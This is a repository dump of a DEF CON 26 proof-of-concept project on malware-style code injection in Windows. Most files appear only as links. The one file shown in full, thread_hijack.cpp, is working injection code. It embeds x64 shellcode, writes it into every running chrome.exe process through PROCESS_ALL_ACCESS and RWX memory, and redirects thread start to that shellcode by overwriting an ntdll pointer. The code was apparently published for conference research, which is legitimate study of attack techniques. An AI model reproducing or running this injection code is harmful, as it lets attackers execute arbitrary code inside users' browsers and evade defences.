├── ole32_inject.cpp ├── comctl32_inject.cpp ├── powerloader_inject.cpp ├── README.md └── thread_hijack.cpp /ole32_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/ole32_inject.cpp -------------------------------------------------------------------------------- /comctl32_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/comctl32_inject.cpp -------------------------------------------------------------------------------- /powerloader_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aaaddress1/Win-Exploit-Inject/HEAD/powerloader_inject.cpp -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Win-Exploit-Inject 2 | PoC for DEF CON 26: Playing Malware Injection with Exploit thoughts. 3 | 4 | See the slides on [Speaker Deck](https://speakerdeck.com/aaaddress1/playing-malware-injection-with-exploit-thoughts) if you're interested.
5 | -------------------------------------------------------------------------------- /thread_hijack.cpp: -------------------------------------------------------------------------------- 1 | /** 2 | * DEF CON 26: 3 | * Playing Malware Injection with Exploit thoughts 4 | * PoC 4 - Thread Hijack 5 | * by aaaddress1@chroot.org 6 | */ 7 | #include 8 | #include 9 | #include 10 | 11 | unsigned char buf[] = \ 12 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" \ 13 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" \ 14 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" \ 15 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" \ 16 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" \ 17 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" \ 18 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" \ 19 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" \ 20 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" \ 21 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" \ 22 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" \ 23 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" \ 24 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" \ 25 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" \ 26 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" \ 27 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ 28 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \ 29 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" \ 30 | "\x00"; 31 | 32 | void inject(DWORD pid) { 33 | 34 | #ifdef _WIN64 35 | UINT64 ptrUsrThrdStrt = (UINT64)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlUserThreadStart"); 36 | printf("RtlUserThreadStart @ %llx\n", ptrUsrThrdStrt); 37 | 38 | UINT64 offsetVia = *(UINT32 *)(ptrUsrThrdStrt + 0x1b + 2); 39 | offsetVia = 
(ptrUsrThrdStrt + 0x1b) + offsetVia + 6; 40 | printf("LdrDelegatedRtlUserThreadStart @ %llx\n", offsetVia); 41 | 42 | // write shellcode 43 | HANDLE access_token = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); 44 | LPVOID alloc_mem = VirtualAllocEx(access_token, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 45 | WriteProcessMemory(access_token, alloc_mem, &buf, sizeof(buf), NULL); 46 | printf("shellcode @ %llx\n", alloc_mem); 47 | 48 | // write LdrDelegatedRtlUserThreadStart 49 | WriteProcessMemory(access_token, LPVOID(offsetVia), &alloc_mem, 8, NULL) 50 | 51 | #else 52 | UINT32 ptrUsrThrdStrt = (UINT32)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlUserThreadStart"); 53 | printf("RtlUserThreadStart @ %llx\n", ptrUsrThrdStrt); 54 | 55 | UINT32 offsetVia = *(UINT32 *)(ptrUsrThrdStrt + 0x0A); 56 | offsetVia = (ptrUsrThrdStrt + 0x07) + offsetVia + 7; 57 | printf("LdrDelegatedRtlUserThreadStart @ %llx\n", offsetVia); 58 | 59 | // write shellcode 60 | HANDLE access_token = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); 61 | LPVOID alloc_mem = VirtualAllocEx(access_token, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 62 | WriteProcessMemory(access_token, alloc_mem, &buf, sizeof(buf), NULL); 63 | printf("shellcode @ %llx\n", alloc_mem); 64 | 65 | // write LdrDelegatedRtlUserThreadStart 66 | WriteProcessMemory(access_token, LPVOID(offsetVia), &alloc_mem, 4, NULL); 67 | #endif 68 | } 69 | 70 | 71 | void inject_via_name(const char proc_name[]) { 72 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 73 | PROCESSENTRY32 process = { 0 }; 74 | process.dwSize = sizeof(process); 75 | 76 | if (Process32First(snapshot, &process)) 77 | while (Process32Next(snapshot, &process)) 78 | if (!stricmp(process.szExeFile, proc_name)) 79 | inject(process.th32ProcessID); 80 | 81 | CloseHandle(snapshot); 82 | } 83 | 84 | int main(void) { 85 | inject_via_name("chrome.exe"); 86 | return 0; 87 | } 
--------------------------------------------------------------------------------